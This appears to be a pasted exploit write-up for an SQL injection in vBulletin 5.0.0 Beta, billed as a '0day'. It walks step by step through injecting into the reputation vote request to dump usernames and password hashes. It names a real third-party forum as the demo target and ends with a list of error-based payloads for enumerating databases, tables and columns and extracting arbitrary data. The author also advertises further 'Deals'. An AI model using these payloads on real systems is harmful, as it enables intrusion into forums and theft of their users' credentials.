vBulletin 5.0.0 all Beta releases SQL Injection Exploit 0day

gistfile1.txt

vBulletin 5.0.0 all Beta releases SQL Injection Exploit 0day

#Category: web application
#Type: SQL Injection
#Requirements: Firefox/Live HTTP Headers/
#Dork: Powered by vBulletin™ Version 5.0.0 Beta   (or) Use ur Brain you'll get more o_O


Step 1
Create an Account on vBulletin forum Verify the account and Activate it

For Demo we will use this Forum 
Link = http://www.prospectrush.com/new_forum/
I have alredy made an account so i wil direct login


Step 2
go to/Open any topic and open Live HTTP Headers (https://addons.mozilla.org/en/firefox/addon/live-http-headers/) << download from here
and then on the Topic page search for "Like" button and Clik on it ....
then the Http responce would be caught on HTTP HEaders addon

Step 3
Go to the first POST in HTTP Headers ,it will look like this
POST *Something /ajax/api/reputation/vote HTTP/1.1
select it and click on Replay button

Step 4
Then go on Send POST Content and use below Query ,
just add the Below Query after "noteid=somenumber"
=======================
SQL Query

) and(select 1 from(select count(*),concat((select (select (SELECT concat(0x7e,0x27,username,0x27,0x7e,password,0x27, 0x7e) FROM user LIMIT 1,1) ) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) AND (1338=1338

=======================

The Above SQLi command will fetch out the first record from user table(username/password)

see the username and pass in encrypted get the salt to and decrypt it i wont show decrypting use your brain :)


=============



Greets to Real Author , All Indian & Pakistani Brothers , 1337day , ashiyane forums & All Indian Hacking Groups

//Note : Those Brothers who have my mail id can Contact me for other Deals
Offer Valid till 29th March 2013

Regards
./NoTty_rAJ

Thanks


[#Other SQLi Syntaxes]

 *********************************************************************************************************************
|Version():
 *********************************************************************************************************************
) and(select 1 from(select count(*),concat((select (select concat(0x7e,0x27,cast(version() as char),0x27,0x7e)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) AND (1338=1338
 *********************************************************************************************************************



 *********************************************************************************************************************
|User():
 *********************************************************************************************************************
 *********************************************************************************************************************
) and(select 1 from(select count(*),concat((select (select concat(0x7e,0x27,cast(user() as char),0x27,0x7e)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) AND (1338=1338
 *********************************************************************************************************************



 *********************************************************************************************************************
|Database():
 *********************************************************************************************************************
 *********************************************************************************************************************
) and(select 1 from(select count(*),concat((select (select concat(0x7e,0x27,cast(database() as char),0x27,0x7e)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) AND (1338=1338
 *********************************************************************************************************************


 *********************************************************************************************************************
|Database Print:
 *********************************************************************************************************************
 *********************************************************************************************************************
) and(select 1 from(select count(*),concat((select (select (SELECT distinct concat(0x7e,0x27,cast(schema_name as char),0x27,0x7e) FROM information_schema.schemata LIMIT 1,1)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) AND (1338=1338
 *********************************************************************************************************************



 *********************************************************************************************************************
|Table Count:
 *********************************************************************************************************************
 *********************************************************************************************************************
) and(select 1 from(select count(*),concat((select (select (SELECT concat(0x7e,0x27,count(table_name),0x27,0x7e) FROM `information_schema`.tables WHERE table_schema=0xHEXCODEOFDATABASE)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) AND (1338=1338
 *********************************************************************************************************************



 *********************************************************************************************************************
|Print Tables:
 *********************************************************************************************************************
 *********************************************************************************************************************
) and(select 1 from(select count(*),concat((select (select (SELECT distinct concat(0x7e,0x27,cast(table_name as char),0x27,0x7e) FROM information_schema.tables Where table_schema=0xHEXCODEOFDATABASE LIMIT N,1)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) AND (1338=1338
 *********************************************************************************************************************



 *********************************************************************************************************************
|Columns of selected table:
 *********************************************************************************************************************
 *********************************************************************************************************************
) and(select 1 from(select count(*),concat((select (select (SELECT concat(0x7e,0x27,count(column_name),0x27,0x7e) FROM `information_schema`.columns WHERE table_schema=0xhex_code_of_database_name AND table_name=0xhex_code_of_table_name)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) AND (1338=1338
 *********************************************************************************************************************



 *********************************************************************************************************************
|Fetch Out Data:
 *********************************************************************************************************************
 *********************************************************************************************************************
) and(select 1 from(select count(*),concat((select (select (SELECT concat(0x7e,0x27,column1,0x27,0x7e,column2,0x27,0x 7e) FROM ANY_TABLE LIMIT N,1) ) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) AND (1338=1338
 *********************************************************************************************************************